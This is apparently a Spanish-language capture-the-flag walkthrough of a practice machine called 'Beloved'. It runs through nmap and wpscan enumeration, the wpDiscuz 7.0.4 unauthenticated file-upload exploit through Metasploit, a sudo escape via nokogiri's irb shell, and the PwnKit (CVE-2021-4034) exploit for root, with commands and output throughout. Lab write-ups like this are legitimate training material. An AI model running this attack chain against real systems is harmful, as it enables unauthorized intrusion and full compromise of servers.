Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.22
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-23 18:47 -04
Nmap scan report for 192.168.1.22
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
| 256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_ 256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Beloved – Just another WordPress site
|_http-generator: WordPress 5.7.2
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.18 secondsEl sitio redirige a http://beloved, que añadimos al /etc/hosts. Es WordPress, así que lo escaneamos con wpscan y encontramos el plugin wpDiscuz 7.0.4:
❯ wpscan --url http://beloved --plugins-detection aggressive -t 50
...
[+] wpdiscuz
| Version: 7.0.4 (80% confidence)
...Ese plugin es vulnerable a varios CVE (CVE-2020-24186); usamos el módulo de Metasploit para subida de archivos no autenticada:
❯ searchsploit wordpress discuz
Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated) | php/webapps/49962.sh
WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated) | php/webapps/49967.py
Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit | php/webapps/49401.rbmsf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > run
...
meterpreter > shell
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Para escalar, revisamos sudo -l:
www-data@beloved:/home$ sudo -l
...
User www-data may run the following commands on beloved:
(beloved) NOPASSWD: /usr/local/bin/nokogirinokogiri (la gema de parseo XML de Ruby) abre una sesión irb, desde la que ejecutamos una shell como beloved:
www-data@beloved:/home$ sudo -u beloved /usr/local/bin/nokogiri /etc/passwd
Your document is stored in @doc...
irb(main):001:0> exec "/bin/bash"
beloved@beloved:/home$Obtenemos la primera flag. Buscamos binarios SUID y encontramos pkexec:
beloved@beloved:~$ find / -perm -4000 2>/dev/null
...
/usr/bin/pkexec
...Explotamos PwnKit (CVE-2021-4034):
beloved@beloved:/tmp$ python3 CVE-2021-4034.py
Do you want to choose a custom payload? y/n (n use default payload)
[+] Cleaning pervious exploiting attempt (if exist)
[+] Creating shared library for exploit code.
[+] Finding a libc library to call execve
[+] Found a library at <CDLL 'libc.so.6', handle 7f25bf6454f0 at 0x7f25bef08b00>
[+] Call execve() with chosen payload
[+] Enjoy your root shell
# whoami
rootObtenemos nuestra flag.
Fin.